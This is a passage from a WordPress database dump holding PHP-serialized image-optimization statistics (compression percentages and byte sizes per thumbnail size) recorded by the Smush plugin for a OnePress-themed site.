9999999997868371792719699442386627197265625;s:5:\"bytes\";i:1023;s:11:\"size_before\";i:20432;s:10:\"size_after\";i:19409;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.70000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:533;s:11:\"size_before\";i:19711;s:10:\"size_after\";i:19178;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:5653;s:11:\"size_before\";i:38683;s:10:\"size_after\";i:33030;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}}}'),(4453,1269,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:33.8048768572178772728875628672540187835693359375;s:5:\"bytes\";i:110713;s:11:\"size_before\";i:327506;s:10:\"size_after\";i:216793;s:4:\"time\";d:1.7800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:2915;s:11:\"size_before\";i:9690;s:10:\"size_after\";i:6775;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.00999999999999801048033987171947956085205078125;s:5:\"bytes\";i:4995;s:11:\"size_before\";i:14689;s:10:\"size_after\";i:9694;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:22778;s:11:\"size_before\";i:66213;s:10:\"size_after\";i:43435;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:28055;s:11:\"size_before\";i:86137;s:10:\"size_after\";i:58082;s:4:\"time\";d:0.59999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.60000000000000142108547152020037174224853515625;s:5:\"bytes\";i:6062;s:11:\"size_before\";i:19185;s:10:\"size_after\";i:13123;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.24000000000000198951966012828052043914794921875;s:5:\"bytes\";i:17388;s:11:\"size_before\";i:49341;s:10:\"size_after\";i:31953;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:28520;s:11:\"size_before\";i:82251;s:10:\"size_after\";i:53731;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}}}'),(4454,1260,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.06659698244471723427295728470198810100555419921875;s:5:\"bytes\";i:28323;s:11:\"size_before\";i:466868;s:10:\"size_after\";i:438545;s:4:\"time\";d:1.54999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:808;s:11:\"size_before\";i:10150;s:10:\"size_after\";i:9342;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1645;s:11:\"size_before\";i:21790;s:10:\"size_after\";i:20145;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:6381;s:11:\"size_before\";i:108684;s:10:\"size_after\";i:102303;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:9704;s:11:\"size_before\";i:179570;s:10:\"size_after\";i:169866;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1527;s:11:\"size_before\";i:18995;s:10:\"size_after\";i:17468;s:4:\"time\";d:1.37999999999999989341858963598497211933135986328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:3347;s:11:\"size_before\";i:48599;s:10:\"size_after\";i:45252;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:4911;s:11:\"size_before\";i:79080;s:10:\"size_after\";i:74169;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4455,1249,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.87884026337497689329580907724448479712009429931640625;s:5:\"bytes\";i:4123;s:11:\"size_before\";i:469141;s:10:\"size_after\";i:465018;s:4:\"time\";d:0.54999999999999993338661852249060757458209991455078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.57999999999999996003197111349436454474925994873046875;s:5:\"bytes\";i:142;s:11:\"size_before\";i:24372;s:10:\"size_after\";i:24230;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1728;s:11:\"size_before\";i:74294;s:10:\"size_after\";i:72566;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:413;s:11:\"size_before\";i:36550;s:10:\"size_after\";i:36137;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.4899999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:1840;s:11:\"size_before\";i:123321;s:10:\"size_after\";i:121481;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:210604;s:10:\"size_after\";i:210604;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4456,1247,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:459813;s:10:\"size_after\";i:459813;s:4:\"time\";d:0.5900000000000000799360577730112709105014801025390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:23870;s:10:\"size_after\";i:23870;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:66975;s:10:\"size_after\";i:66975;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:41001;s:10:\"size_after\";i:41001;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:122405;s:10:\"size_after\";i:122405;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:205562;s:10:\"size_after\";i:205562;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}}}'),(4457,1242,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.004870446132865770098863134052180612343363463878631591796875;s:5:\"bytes\";i:30;s:11:\"size_before\";i:615960;s:10:\"size_after\";i:615930;s:4:\"time\";d:0.6699999999999999289457264239899814128875732421875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25833;s:10:\"size_after\";i:25833;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:76857;s:10:\"size_after\";i:76857;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.05000000000000000277555756156289135105907917022705078125;s:5:\"bytes\";i:30;s:11:\"size_before\";i:54572;s:10:\"size_after\";i:54542;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:166879;s:10:\"size_after\";i:166879;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:291819;s:10:\"size_after\";i:291819;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}}}'),(4458,1241,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.36122216924036276708420700742863118648529052734375;s:5:\"bytes\";i:4756;s:11:\"size_before\";i:109052;s:10:\"size_after\";i:104296;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.25;s:5:\"bytes\";i:317;s:11:\"size_before\";i:6035;s:10:\"size_after\";i:5718;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:422;s:11:\"size_before\";i:12417;s:10:\"size_after\";i:11995;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.850000000000000088817841970012523233890533447265625;s:5:\"bytes\";i:453;s:11:\"size_before\";i:11756;s:10:\"size_after\";i:11303;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1180;s:11:\"size_before\";i:28946;s:10:\"size_after\";i:27766;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:2384;s:11:\"size_before\";i:49898;s:10:\"size_after\";i:47514;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4459,1240,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.61894388131717814616195028065703809261322021484375;s:5:\"bytes\";i:5131;s:11:\"size_before\";i:111086;s:10:\"size_after\";i:105955;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:501;s:11:\"size_before\";i:7793;s:10:\"size_after\";i:7292;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:766;s:11:\"size_before\";i:14087;s:10:\"size_after\";i:13321;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:723;s:11:\"size_before\";i:13094;s:10:\"size_after\";i:12371;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1261;s:11:\"size_before\";i:30292;s:10:\"size_after\";i:29031;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1880;s:11:\"size_before\";i:45820;s:10:\"size_after\";i:43940;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4460,1239,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.15902129631301153978029105928726494312286376953125;s:5:\"bytes\";i:10235;s:11:\"size_before\";i:166179;s:10:\"size_after\";i:155944;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:690;s:11:\"size_before\";i:9737;s:10:\"size_after\";i:9047;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:1332;s:11:\"size_before\";i:19405;s:10:\"size_after\";i:18073;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1275;s:11:\"size_before\";i:18088;s:10:\"size_after\";i:16813;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:2594;s:11:\"size_before\";i:45428;s:10:\"size_after\";i:42834;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4344;s:11:\"size_before\";i:73521;s:10:\"size_after\";i:69177;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4461,1237,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.679032828351510797659784657298587262630462646484375;s:5:\"bytes\";i:3940;s:11:\"size_before\";i:147068;s:10:\"size_after\";i:143128;s:4:\"time\";d:0.11999999999999998168132009368491708301007747650146484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:181;s:11:\"size_before\";i:4269;s:10:\"size_after\";i:4088;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:245;s:11:\"size_before\";i:8878;s:10:\"size_after\";i:8633;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:814;s:11:\"size_before\";i:33568;s:10:\"size_after\";i:32754;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1796;s:11:\"size_before\";i:52539;s:10:\"size_after\";i:50743;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:201;s:11:\"size_before\";i:7534;s:10:\"size_after\";i:7333;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.689999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:272;s:11:\"size_before\";i:16080;s:10:\"size_after\";i:15808;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7800000000000000266453525910037569701671600341796875;s:5:\"bytes\";i:431;s:11:\"size_before\";i:24200;s:10:\"size_after\";i:23769;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4462,1236,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.0808311614124033184225481818430125713348388671875;s:5:\"bytes\";i:2286;s:11:\"size_before\";i:56018;s:10:\"size_after\";i:53732;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:276;s:11:\"size_before\";i:6963;s:10:\"size_after\";i:6687;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.680000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:450;s:11:\"size_before\";i:12230;s:10:\"size_after\";i:11780;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:391;s:11:\"size_before\";i:9737;s:10:\"size_after\";i:9346;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1169;s:11:\"size_before\";i:27088;s:10:\"size_after\";i:25919;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4463,1235,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.38755020080321234132725294330157339572906494140625;s:5:\"bytes\";i:2622;s:11:\"size_before\";i:59760;s:10:\"size_after\";i:57138;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:355;s:11:\"size_before\";i:7000;s:10:\"size_after\";i:6645;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:607;s:11:\"size_before\";i:13520;s:10:\"size_after\";i:12913;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:529;s:11:\"size_before\";i:11332;s:10:\"size_after\";i:10803;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1131;s:11:\"size_before\";i:27908;s:10:\"size_after\";i:26777;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4464,1234,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.1713309423625428706827733549289405345916748046875;s:5:\"bytes\";i:1123;s:11:\"size_before\";i:35411;s:10:\"size_after\";i:34288;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.45000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:213;s:11:\"size_before\";i:4787;s:10:\"size_after\";i:4574;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:251;s:11:\"size_before\";i:8043;s:10:\"size_after\";i:7792;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.600000000000000088817841970012523233890533447265625;s:5:\"bytes\";i:245;s:11:\"size_before\";i:6801;s:10:\"size_after\";i:6556;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:414;s:11:\"size_before\";i:15780;s:10:\"size_after\";i:15366;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4465,1233,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.21584461837909518777678385959006845951080322265625;s:5:\"bytes\";i:2036;s:11:\"size_before\";i:48294;s:10:\"size_after\";i:46258;s:4:\"time\";d:7.56999999999999939603867460391484200954437255859375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:362;s:11:\"size_before\";i:5980;s:10:\"size_after\";i:5618;s:4:\"time\";d:7.54000000000000003552713678800500929355621337890625;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:458;s:11:\"size_before\";i:10522;s:10:\"size_after\";i:10064;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:353;s:11:\"size_before\";i:8422;s:10:\"size_after\";i:8069;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.689999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:863;s:11:\"size_before\";i:23370;s:10:\"size_after\";i:22507;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4466,1232,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.40803887653405812585560852312482893466949462890625;s:5:\"bytes\";i:1556;s:11:\"size_before\";i:24282;s:10:\"size_after\";i:22726;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:219;s:11:\"size_before\";i:3418;s:10:\"size_after\";i:3199;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:331;s:11:\"size_before\";i:5423;s:10:\"size_after\";i:5092;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.69000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:306;s:11:\"size_before\";i:4577;s:10:\"size_after\";i:4271;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.44000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:700;s:11:\"size_before\";i:10864;s:10:\"size_after\";i:10164;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4467,1231,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.959928491921611115600398989045061171054840087890625;s:5:\"bytes\";i:1174;s:11:\"size_before\";i:29647;s:10:\"size_after\";i:28473;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:145;s:11:\"size_before\";i:3305;s:10:\"size_after\";i:3160;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.75;s:5:\"bytes\";i:253;s:11:\"size_before\";i:6741;s:10:\"size_after\";i:6488;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:241;s:11:\"size_before\";i:5994;s:10:\"size_after\";i:5753;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.930000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:535;s:11:\"size_before\";i:13607;s:10:\"size_after\";i:13072;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4468,1230,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.01907125991402747189340516342781484127044677734375;s:5:\"bytes\";i:3316;s:11:\"size_before\";i:66068;s:10:\"size_after\";i:62752;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:325;s:11:\"size_before\";i:6737;s:10:\"size_after\";i:6412;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:581;s:11:\"size_before\";i:13875;s:10:\"size_after\";i:13294;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:545;s:11:\"size_before\";i:11642;s:10:\"size_after\";i:11097;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1865;s:11:\"size_before\";i:33814;s:10:\"size_after\";i:31949;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4469,1229,'wp-smpro-smush-data','a:2:{s:5: